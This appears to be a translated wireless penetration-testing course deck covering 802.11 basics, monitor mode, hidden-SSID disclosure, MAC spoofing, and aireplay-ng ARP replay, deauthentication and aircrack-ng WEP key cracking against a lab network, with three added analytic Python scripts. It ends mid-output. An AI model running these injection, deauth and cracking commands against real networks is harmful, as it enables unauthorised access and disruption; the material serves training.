Clavis Teste de Invasao Sem Fio EAD

Page 1: Clavis Teste de Invasao Sem Fio EAD

Wireless Network Penetration Testing

Nelson Murilo, Clavis Segurança da Informação

Page 2

$ whoami

•  Infosec consultant
•  2 published books
•  Pentester
•  Forensic investigator
•  Incident handler
•  Instructor and speaker

Page 3

Contacts

[email protected]
nelson.murilo
@nelsonmurilo

Page 4

Course format

•  Live (online) classes
•  Recorded classes for review
•  Lab environments for testing
•  Supplementary material
•  Assessment

Page 5

Agenda

•  Introduction
•  Wi-Fi network concepts
•  Main vulnerabilities
•  Current tools
•  Probing and mapping
•  Identifying the environment
•  Attacks
•  Wrapping up

Page 6

Introduction

•  Concepts
•  Characteristics

Page 7

Wireless networks

§  Wi-Fi
§  Bluetooth
§  Infrared
§  WiMax
§  RFID
§  Cellular (GSM/TDMA/CDMA, etc.)
§  ZigBee (802.15.4)
§  UWB (802.15.3)

Page 8

IEEE 802.11, current standards:

802.11b   11 Mb    2.4 GHz
802.11a   54 Mb    5.1 GHz
802.11g   54 Mb    2.4 GHz
802.11i   Security mechanisms
802.1x    Authentication mechanisms, used on wired and wireless networks
802.11n   Higher speed, 108 Mb nominal

Page 9

Page 10

# dmesg | grep phy
[    0.000000] BIOS-provided physical RAM map:
[   84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[   84.913969] Registered led device: rt2800usb-phy0::radio
[   84.913999] Registered led device: rt2800usb-phy0::assoc
[   84.914026] Registered led device: rt2800usb-phy0::quality

Page 11

# iwconfig
lo        no wireless extensions.

wlan4     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

eth4      no wireless extensions.

Page 12

Channels

Page 13

Channels

Page 14

Channels

Page 15

Channels

Page 16

Channels

$ iwlist wlan0 freq
wlan0     24 channels in total; available frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 36 : 5.18 GHz
          Channel 40 : 5.2 GHz
          Channel 44 : 5.22 GHz
          Channel 48 : 5.24 GHz
          Channel 52 : 5.26 GHz
          Channel 56 : 5.28 GHz
          Channel 60 : 5.3 GHz
          Channel 64 : 5.32 GHz
          Channel 149 : 5.745 GHz
          Channel 153 : 5.765 GHz
          Channel 157 : 5.785 GHz
          Channel 161 : 5.805 GHz
          Channel 165 : 5.825 GHz
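Added example, not from the course slides: the channel list above follows a fixed formula, which the Python script below uses to convert channel numbers to centre frequencies and back, to flag overlapping 2.4 GHz channels (the reason a monitoring sensor is usually set to hop 1, 6 and 11), and to cross-check an `iwlist wlan0 freq` listing against the formula. `IWLIST_SAMPLE` is constructed from the channels shown on the slide; function names such as `channel_to_mhz` and `check_listing` are this example's own.

```python
"""Added example (not from the course slides): IEEE 802.11 channel <-> frequency
arithmetic plus a sanity check of an `iwlist <iface> freq` listing."""
import re


def channel_to_mhz(channel: int) -> int:
    """Centre frequency in MHz. 2.4 GHz channels sit 5 MHz apart starting at
    2412 MHz (channel 1); channel 14 is the irregular 2484 MHz channel;
    5 GHz channels are 5000 + 5*n MHz."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484
    if 32 <= channel <= 177:
        return 5000 + 5 * channel
    raise ValueError(f"not an 802.11 channel: {channel}")


def mhz_to_channel(mhz: int) -> int:
    """Inverse of channel_to_mhz."""
    if mhz == 2484:
        return 14
    if 2412 <= mhz <= 2472 and (mhz - 2407) % 5 == 0:
        return (mhz - 2407) // 5
    if 5160 <= mhz <= 5885 and mhz % 5 == 0:
        return (mhz - 5000) // 5
    raise ValueError(f"not an 802.11 centre frequency: {mhz} MHz")


def overlap_24ghz(a: int, b: int) -> bool:
    """802.11b channels are 22 MHz wide, so two 2.4 GHz channels overlap unless
    they are at least 5 channel numbers (25 MHz) apart. That is why 1/6/11 is
    the usual non-overlapping set, and why a sensor hopping only those three
    still observes most of the band."""
    if not (1 <= a <= 14 and 1 <= b <= 14):
        raise ValueError("2.4 GHz channels only")
    return abs(a - b) < 5


# Constructed from the channels listed on the slide (not a real capture).
IWLIST_SAMPLE = """\
wlan0     24 channels in total; available frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 36 : 5.18 GHz
          Channel 40 : 5.2 GHz
          Channel 44 : 5.22 GHz
          Channel 48 : 5.24 GHz
          Channel 52 : 5.26 GHz
          Channel 56 : 5.28 GHz
          Channel 60 : 5.3 GHz
          Channel 64 : 5.32 GHz
          Channel 149 : 5.745 GHz
          Channel 153 : 5.765 GHz
          Channel 157 : 5.785 GHz
          Channel 161 : 5.805 GHz
          Channel 165 : 5.825 GHz
"""

CHANNEL_LINE = re.compile(r"Channel\s+(\d+)\s*:\s*([\d.]+)\s*GHz")


def parse_iwlist_freq(text: str) -> list:
    """(channel, MHz) pairs from `iwlist freq` output."""
    return [(int(ch), round(float(ghz) * 1000)) for ch, ghz in CHANNEL_LINE.findall(text)]


def check_listing(text: str) -> list:
    """Entries whose reported frequency disagrees with the formula, as
    (channel, reported MHz, expected MHz). An empty list means the driver's
    channel table is consistent."""
    return [(ch, mhz, channel_to_mhz(ch))
            for ch, mhz in parse_iwlist_freq(text)
            if channel_to_mhz(ch) != mhz]


if __name__ == "__main__":
    for ch, mhz in parse_iwlist_freq(IWLIST_SAMPLE):
        print(f"channel {ch:3d} -> {mhz} MHz -> channel {mhz_to_channel(mhz)}")
    print("mismatches:", check_listing(IWLIST_SAMPLE))
    print("1 and 6 overlap:", overlap_24ghz(1, 6), "| 1 and 5 overlap:", overlap_24ghz(1, 5))
```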

Page 17

Ad-Hoc

Page 18

Infrastructure

Page 19

((( Network name )))

Infrastructure

Page 20

((( Network name )))

Infrastructure

Page 21

Infrastructure

Page 22

Infrastructure

Page 23

Infrastructure

Page 24

Infrastructure

Page 25

Infrastructure

Page 26

Network name disclosure

Page 27

Network name disclosure

# iwlist wlan0 scan | egrep "Address|ESSID"
[...]
          Cell 05 - Address: 7C:4F:B5:E4:CC:80
                    ESSID:"GVT-CC81"
          Cell 06 - Address: 00:07:40:4D:1A:5C
                    ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
          Cell 07 - Address: 6C:2E:85:F3:0C:8B
                    ESSID:"GVT-0C87"

Page 28

Network name disclosure

23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3

Page 29

Network name disclosure

09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]

00:07:40:4D:1A:5C

Page 30

Network name disclosure

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
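Added example, not part of the course slides: the probe request/response exchange above is exactly what makes a "hidden" network name recoverable. The Python script below parses 802.11 management frames in tcpdump's `-e` output format, lists every BSSID that beacons with an empty or all-NUL SSID, reports the name that a probe response from that BSSID disclosed, and lists which client stations asked for which networks by name. `SAMPLE_LOG` is constructed from the addresses and names on the slides (the `02:00:00:00:00:01` BSSID is invented) and is not a real capture; the function names are this example's own. Read from the defender's side, the two findings belong together: hiding the SSID is not a confidentiality control, and every directed probe request a client sends names a network it already trusts.

```python
"""Added example (not from the course slides): hidden-SSID and probing-client
report over tcpdump-style 802.11 management frames."""
import re
from collections import defaultdict
from typing import Optional

# Constructed sample in tcpdump `-e` 802.11 format; addresses/names from the
# slides, 02:00:00:00:00:01 invented. Raw string so the \x00 escapes stay literal.
SAMPLE_LOG = r"""
23:05:16.386193 BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:Broadcast SA:00:07:40:4d:1a:5c (oui Unknown) Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 BSSID:00:25:9c:36:0a:ef (oui Unknown) DA:Broadcast SA:00:25:9c:36:0a:ef (oui Unknown) Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:18.004411 BSSID:02:00:00:00:00:01 (oui Unknown) DA:Broadcast SA:02:00:00:00:00:01 (oui Unknown) Beacon (\x00\x00\x00\x00\x00\x00\x00\x00) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 6
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11
09:15:43.100200 BSSID:Broadcast DA:Broadcast SA:00:1b:77:7c:2c:a7 (oui Unknown) Probe Request (Notebook) [1.0 2.0 5.5 11.0 Mbit]
"""

MAC = r"[0-9a-f]{2}(?::[0-9a-f]{2}){5}|Broadcast"
FRAME_RE = re.compile(
    rf"BSSID:(?P<bssid>{MAC}).*?SA:(?P<sa>{MAC}).*?"
    r"(?P<kind>Beacon|Probe Response|Probe Request) \((?P<ssid>[^)]*)\)"
)
# A hidden SSID shows up as an empty name or as NUL bytes (tcpdump escapes them as \x00).
HIDDEN_RE = re.compile(r"(\\x00)*")


def is_hidden(ssid: str) -> bool:
    return HIDDEN_RE.fullmatch(ssid) is not None


def hidden_network_report(log: str) -> dict:
    """BSSIDs that beacon with a hidden SSID, mapped to the name a probe
    response from that BSSID disclosed (None if nothing disclosed it)."""
    hidden_bssids = set()
    disclosed: dict = {}
    for line in log.splitlines():
        m = FRAME_RE.search(line)
        if not m:
            continue
        bssid, kind, ssid = m["bssid"], m["kind"], m["ssid"]
        if kind == "Beacon" and is_hidden(ssid):
            hidden_bssids.add(bssid)
        elif kind == "Probe Response" and not is_hidden(ssid):
            disclosed[bssid] = ssid
    return {b: disclosed.get(b) for b in sorted(hidden_bssids)}


def probing_clients(log: str) -> dict:
    """Client MAC -> set of network names it asked for in directed probe requests.
    Each name is a network the client already knows and will join again."""
    out = defaultdict(set)
    for line in log.splitlines():
        m = FRAME_RE.search(line)
        if m and m["kind"] == "Probe Request" and not is_hidden(m["ssid"]):
            out[m["sa"]].add(m["ssid"])
    return dict(out)


if __name__ == "__main__":
    for bssid, name in hidden_network_report(SAMPLE_LOG).items():
        print(f"hidden SSID on {bssid}: " + (f"disclosed as {name!r}" if name else "not disclosed in this capture"))
    for client, names in probing_clients(SAMPLE_LOG).items():
        print(f"client {client} probes for: {sorted(names)}")
```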

Page 31

WEP

Page 32

WPA

Page 33

WPA-PSK (Pre-shared Key)

Page 34

WPA - Enterprise

RADIUS

Page 35

WPA - Enterprise

RADIUS
/etc/password
/etc/raddb/users
Oracle/MySQL/etc
Digital certificate
Biometrics

Page 36

Page 37

Initial concepts

$ /sbin/ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:21:29:65:b8:45
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Page 38

Promiscuous mode

# tcpdump -vv -c 3 -i wlan0
tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 65535 bytes
14:00:37.291962 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84)
    192.168.11.2 > air: ICMP echo request, id 30507, seq 9, length 64
14:00:37.292417 IP (tos 0x0, ttl 64, id 8024, offset 0, flags [DF], proto UDP (17), length 71)
    192.168.11.2.49351 > air: [udp sum ok] 2302+ PTR? 1.11.168.192.in-addr.arpa. (43)
14:00:37.294831 IP (tos 0x0, ttl 255, id 49706, offset 0, flags [none], proto ICMP (1), length 84)
    air > 192.168.11.2: ICMP echo reply, id 30507, seq 9, length 64
3 packets captured

Page 39

Promiscuous mode

# iwconfig wlan0
wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

# iw wlan0 info
Interface wlan0
        ifindex 32
        type managed

Page 40

Monitor mode

# iw dev wlan0 interface add mon0 type monitor

# iwconfig wlan0 mode monitor

Page 41

Monitor mode

# iwconfig mon0
mon0      IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

# iw mon0 info
Interface mon0
        ifindex 35
        type monitor

Page 42

Monitor mode

# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 65535 bytes
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1, PRIVACY[|802.11]
14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP Encrypted 0us Data IV:5b5 Pad 20 KeyID 2
14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured

Page 43

Channel selection

# iwconfig mon0 channel 11
# iwconfig mon0
mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

Page 44

Channel selection

# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 65535 bytes
14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]
14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]
14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]
3 packets captured

Page 45

Identifying APs

 CH  5 ][ Elapsed: 0 s ][ 2012-03-07 14:39

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:25:9C:36:A0:9F  -88   15       18      108   47   5  11e. OPN              bsbca

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 00:25:9C:36:A0:9F  00:0E:2E:EC:6B:05   -1   11 - 0     0       1
 00:25:9C:36:A0:9F  00:0E:2E:45:F5:B3   -1   11 - 0     0       1

Page 46

Identifying APs

grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt
00-25-9C   (hex)                Cisco-Linksys, LLC

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:25:9C:36:A0:9F  -88   15       18      108   47   5  11e. OPN              bsbca

Page 47

Identifying APs

Traffic analysis

tshark -r Kismet-20120309-04-23-25-1.pcapdump
 6007 334.636502 Apple_67:a1:ef -> Broadcast         ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
 6448 358.804988 192.168.1.191 -> 239.255.255.250   SSDP 487 NOTIFY * HTTP/1.1
 9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18?  Tell 192.168.1.1
 9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18?  Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251       MDNS 645 Standard query response TXT, cache flush PTR

Page 48

Identifying APs

Traffic analysis

iwconfig wlan5 essid bsbca

iwconfig wlan5
wlan5     IEEE 802.11abgn  ESSID:"bsbca"
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

Page 49

MAC filtering

Page 50

MAC filtering

Page 51

MAC filtering

Page 52

MAC filtering

Page 53

MAC filtering

OpenBSD/NetBSD   # wiconfig wi0 -m 00:00:00:00:00:01
Linux            # ifconfig ath0 hw ether 00:00:00:00:00:01
FreeBSD          # ifconfig xl3 ether 00:00:00:00:00:01
Mac OS X         # ifconfig en0 ether 00:00:00:00:00:01

Page 54

MAC filtering

Page 55

Wired Equivalent Privacy

Page 56

Wired Equivalent Privacy

•  Fragile protocol
•  Cracking it requires capturing a large number of packets (5,000+)
•  Or a dictionary attack
•  Several tools available
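Added example, not from the course slides: the "large number of packets" bullet has an arithmetic reason. WEP prepends a 24-bit IV to the RC4 key, so only 2^24 keystreams exist per key, and the birthday bound puts the first repeated IV at a few thousand frames on a busy network; repeated keystream is what the statistical attacks shown later feed on. The Python below computes that bound with the standard approximation and, over a constructed list of (BSSID, IV) pairs, reports which IVs were reused. Two IV values (0x5b5 and 0x4104) are the ones in the slide's tcpdump output, the rest are invented; the function names are this example's own.

```python
"""Added example (not from the course slides): WEP IV-space arithmetic and an
IV-reuse check over a constructed frame list."""
import math
from collections import Counter

IV_BITS = 24
IV_SPACE = 1 << IV_BITS          # 16,777,216 possible IVs per WEP key


def iv_collision_probability(frames: int) -> float:
    """P(at least one IV repeats) among `frames` frames with uniformly random
    IVs: 1 - exp(-n(n-1)/2N), the usual birthday approximation."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2 * IV_SPACE))


def frames_for_collision_probability(p: float) -> int:
    """Smallest n with iv_collision_probability(n) >= p, obtained by solving
    n^2 - n + 2N*ln(1-p) = 0 for n and rounding up."""
    if not 0 < p < 1:
        raise ValueError("p must be in (0, 1)")
    return math.ceil(0.5 + math.sqrt(0.25 - 2 * IV_SPACE * math.log1p(-p)))


def iv_reuse(frames: list) -> dict:
    """Per BSSID, the IVs that occur more than once in the capture. Every repeat
    means two frames were encrypted with the same RC4 keystream, so the XOR of
    their ciphertexts equals the XOR of their plaintexts."""
    per_bssid: dict = {}
    for bssid, iv in frames:
        per_bssid.setdefault(bssid, Counter())[iv] += 1
    return {bssid: sorted(iv for iv, n in counts.items() if n > 1)
            for bssid, counts in per_bssid.items()
            if any(n > 1 for n in counts.values())}


# Constructed (BSSID, IV) pairs; 0x5b5 and 0x4104 are the IVs shown in the
# slide's tcpdump output, the remaining values and repeats are invented.
SAMPLE_FRAMES = [
    ("00:07:40:4D:1A:5C", 0x5b5),
    ("00:07:40:4D:1A:5C", 0x4104),
    ("00:07:40:4D:1A:5C", 0x5b6),
    ("00:07:40:4D:1A:5C", 0x5b5),
    ("00:07:40:4D:1A:5C", 0x4104),
    ("00:25:9C:36:0A:EF", 0x1),
]


if __name__ == "__main__":
    n = frames_for_collision_probability(0.5)
    print(f"50% chance of a repeated IV after {n} frames "
          f"(P = {iv_collision_probability(n):.4f}); 99% after "
          f"{frames_for_collision_probability(0.99)} frames")
    for bssid, ivs in iv_reuse(SAMPLE_FRAMES).items():
        print(f"{bssid}: reused IVs {[hex(iv) for iv in ivs]}")
```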

Page 57

Wired Equivalent Privacy

Page 58

Wired Equivalent Privacy

 CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:07:40:4D:1A:5C  -39    0        3       17    8  11  54   WEP  WEP         LABVIRUS

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 00:07:40:4D:1A:5C  00:21:29:65:B8:45    0   54 -36     0      20  LABVIRUS

Page 59

Wired Equivalent Privacy

Page 60

/usr/local/etc/kismet.conf

logtypes=pcapdump,gpsxml,netxml,nettxt,alert
gps=true
preferredchannels=1,6,11
allowplugins=true

Page 61

Page 62

Page 63

$ ls -lh Kismet*
-rw-r--r-- 1 root root 8.0M 2012-02-20 14:04 Kismet-20120220-13-47-37-1.pcapdump

Page 64

Page 65

http://blog.kismetwireless.net/

Page 66

Suite made up of several programs:

•  Traffic analysis
•  WEP key cracking (several types of attack)
•  Packet injection
•  WPA(2)-PSK key cracking using a dictionary
•  Fake access point creation

Page 67

Common sequence:

•  Airmon-ng: puts the interface in monitor mode
•  Airodump-ng: viewing and capturing packets
•  Aircrack-ng: WEP key cracking

Page 68

# airmon-ng

Interface  Chipset              Driver
wlan5      Ralink RT2870/3070   rt2800usb - [phy48]

Page 69

# airmon-ng start wlan5

Interface  Chipset              Driver
wlan2      Realtek RTL8187L     rtl8187 - [phy51]
                                (monitor mode enabled on mon0)

Page 70

# airmon-ng start wlan5 11

Interface  Chipset              Driver
wlan2      Realtek RTL8187L     rtl8187 - [phy51]
                                (monitor mode enabled on mon0)

Page 71

Airodump-ng

# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.

Page 72

Airodump-ng

# airodump-ng mon0

 CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:07:40:4D:1A:5C  -41 1091    55109        0    0  11  54   WEP  WEP         LABVIRUS

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 00:07:40:4D:1A:5C  00:21:29:65:B8:45 -127    0 - 1     3       9  LABVIRUS

Page 73

Aircrack-ng

$ aircrack-ng labvirus-01.pcap

                                 [00:00:05] Tested 633 keys (got 46103 IVs)

   KB    depth   byte(vote)
    0    2/  4   14(55552) 13(54528) 3C(53504) 98(53504) 24(53248)
    1    2/  1   DE(54784) 92(54528) 06(52992) 7D(52736) 02(52480)
    2    1/  3   82(56576) 18(54272) 45(53760) CD(53504) FC(53248)
    3    1/  3   09(57600) 08(55808) 41(55040) C9(54016) 8E(52992)
    4   51/  4   A1(48640) 83(48384) 86(48384) 99(48384) B2(48384)

             KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxx )
        Decrypted correctly: 100%

Page 74

Wired Equivalent Privacy

Page 75

Wired Equivalent Privacy

Page 76

Aireplay-ng

# aireplay-ng --test mon0
17:33:50  Trying broadcast probe requests...
17:33:50  Injection is working!
17:33:52  Found 1 AP

17:33:52  Trying directed probe requests...
17:33:52  00:25:9C:36:0A:EF - channel: 11 - 'LABVIRUS'
17:33:52  Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52  30/30: 100%

Page 77

Aireplay-ng

# aireplay-ng --arpreplay -h mac_cliente -e ESSID interface

# arp -an
#
# ping -c 1 192.168.11.1
PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=255 time=54.9 ms

--- 192.168.11.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 54.973/54.973/54.973/0.000 ms

# arp -an
(192.168.11.1) at 00:07:40:35:a1:18 [ether] on wlan0

Page 78

Aireplay-ng

 CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:07:40:4D:1A:5C  -38  100      239       58    1  11  54   WEP  WEP         LABVIRUS

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 00:07:40:4D:1A:5C  00:21:29:65:B8:45  -14   36 -54     1     128  LABVIRUS

Page 79

Aireplay-ng

aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:21:29:65:B8:45
17:44:10  Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)

Page 80

Aireplay-ng

 CH 11 ][ Elapsed: 48 s ][ 2012-02-21 17:44 ][ Decloak: 00:07:40:4D:1A:5C

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:07:40:4D:1A:5C  -38  100      353    14438  652  11  54   WEP  WEP         LABVIRUS

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 00:07:40:4D:1A:5C  00:21:29:65:B8:45    0   54 - 1  4042   28810  LABVIRUS

Page 81

Aireplay-ng

# airmon-ng start wlan5 11

Interface  Chipset              Driver
wlan2      Realtek RTL8187L     rtl8187 - [phy51]
                                (monitor mode enabled on mon0)

# airodump-ng -c 11 mon0

Page 82

Aireplay-ng

•  Wait for a new connection
•  Force a disconnection:
   aireplay-ng --deauth 100 -h MAC_CLIENTE -e ESSID mon0

Page 83

ivstools-ng

                                 Aircrack-ng 1.1 r2076

                 [00:00:02] Tested 132441 keys (got 2448 IVs)

   KB    depth   byte(vote)
    0   19/ 34   F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
    1   43/  1   E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
    2   42/  2   BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
    3    0/  7   CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
    4    8/ 47   FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)

Failed. Next try with 5000 IVs.

Page 84

ivstools-ng

                                 Aircrack-ng 1.1 r2076

                 [00:00:03] Tested 163521 keys (got 7120 IVs)

   KB    depth   byte(vote)
    0    4/  7   FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
    1   23/ 24   B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704) 28)
    2   44/  2   FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192) 8)
    3   19/  3   93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960) 84)
    4   19/ 20   BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704) 8)

Failed. Next try with 10000 IVs.

Page 85

ivstools-ng

for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done
Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Opening poucosivs-03.cap
Creating poucosivs-03.cap.ivs
Read 551433 packets.
Written 30547 IVs.
Opening poucosivs-04.cap
Creating poucosivs-04.cap.ivs
Read 129917 packets.
Written 13092 IVs.

Page 86

ivstools-ng

ivstools --merge *.ivs poucostotal.ivs
Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
Opening poucosivs-03.cap.ivs
4524402 bytes written
Opening poucosivs-04.cap.ivs
6319236 bytes written

Page 87

ivstools-ng

# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap
Opening poucosivs-01.cap
Opening poucosivs-02.cap
Opening poucosivs-03.cap
Opening poucosivs-04.cap
Read 689344 packets.

   #  BSSID              ESSID                     Encryption

